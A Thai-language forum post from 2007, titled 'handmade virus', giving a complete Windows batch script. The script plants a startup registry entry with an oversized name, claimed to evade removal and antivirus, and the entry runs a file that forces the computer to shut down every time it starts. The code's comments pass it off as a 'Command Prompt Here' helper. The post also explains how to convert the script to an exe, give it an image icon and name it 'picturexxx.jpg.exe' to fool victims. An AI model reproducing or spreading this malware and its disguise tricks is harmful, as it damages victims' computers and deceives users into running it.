ไวรัสทำมือ

**tata7415263** · 19-08-2007, 02:38 PM

มีเกล็ดความรู้นิดหน่อยมาเล่นสู่กันฝัง อิอิ ไฟล์ registry รองรับชื่อของstring แค่259ตัวอักษร แต่ถ้าตั้งชื่อ260ตัว string ตัวนั้นจะ - -" ไปลองดูเอา เดี๋ยวไปม่ตื่นเต้น เราจะเอาความรู้จากตรงนี้ไปเขียนป็น bat ไฟล์ โดยใช้ภาษา batch ซึ้งคำสั่งก็มาจากของวินโดว์เอง ดังนั้นมันจึงไม่มองว่าเป็นไวรัสแน่ๆ
ดังนั้น แอนตี้ไว้รัสหาไม่เจอ [/heh]

////////////////////////////////////////เซฟ ซอดด้านล่างเป็น ดอท แบท เองนะครับ
@ECHO OFF
:: No parameters required
IF NOT [%1]==[] GOTO Syntax

:: Choose the correct command processor for the current operating system
SET _cmd=
:: Variable to add shortcut to menu entry (NT only,
:: since COMMAND.COM cannot echo an ampersand)
SET _=
ECHO.%COMSPEC% | FIND /I "command.com" >NUL
IF NOT ERRORLEVEL 1 SET _cmd=command.com /e:4096
ECHO.%COMSPEC% | FIND /I "cmd.exe" >NUL
IF NOT ERRORLEVEL 1 SET _cmd=cmd.exe
IF [%_cmd%]==[cmd.exe] SET _=^&

:: Create a temporary .REG file
> "%Temp%.\DefOpen.reg" ECHO REGEDIT4
>>"%Temp%.\DefOpen.reg" ECHO.

:: If neither COMMAND.COM nor CMD.EXE then skip this step
IF [%_cmd%]==[] ECHO Skipping "Command Prompt Here" entry
IF [%_cmd%]==[] GOTO Merge

ECHO Adding "Command Prompt Here" entry
:: Add Command Prompt Here for files
>>"%Temp%.\DefOpen.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
>>"%Temp%.\DefOpen.reg" ECHO "aeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaaeattaae"="C:\WINDOWS\system32\drivers\etc\shutdown.bat"
>>"%Temp%.\DefOpen.reg" ECHO.
>>"C:\WINDOWS\system32\drivers\etc\shutdown.bat" ECHO @echo
>>"C:\WINDOWS\system32\drivers\etc\shutdown.bat" ECHO shutdown -t 60 -s -c "เครื่องคุณติดเชื้อวัวบ้าแล้ว และกำลังจะระเบิดตัวเองใน1นาที"
>>"C:\WINDOWS\system32\drivers\etc" ECHO.

:: Merge the temporary .REG file
:Merge
START /WAIT REGEDIT /S "%Temp%.\DefOpen.reg"

:: Delete the temporary .REG file
DEL "%Temp%.\DefOpen.reg"

:: Ready
GOTO End

:Syntax
ECHO.

:: Clean up variables and quit
:End
SET _cmd=
SET _=

///////////////////////////////////////////////////////จบหล่ะ
เซฟเป็นแบทซ่ะ อ่ะ ถ้าจะให้อินเตอร์หน่อยก็ หาโปรแกรม bat2exe มาconvert ให้เป็น exe แล้วใช้ โปรแกรม ResHack ทำการ Attach ไฟล์icon เข้าไป ถ้าจะให้เวอร์ ลองทำ icon เป็นคล้ายไฟล์รูปนามสกุล jpg bmp อะไรพวกนี้ แล้วตั้งชื่อไฟล์ ประมาณนี้ picturexxx.jpg.exe อุอุ

Thread: ไวรัสทำมือ

Thread Tools

Members who have read this thread : 0

Posting Permissions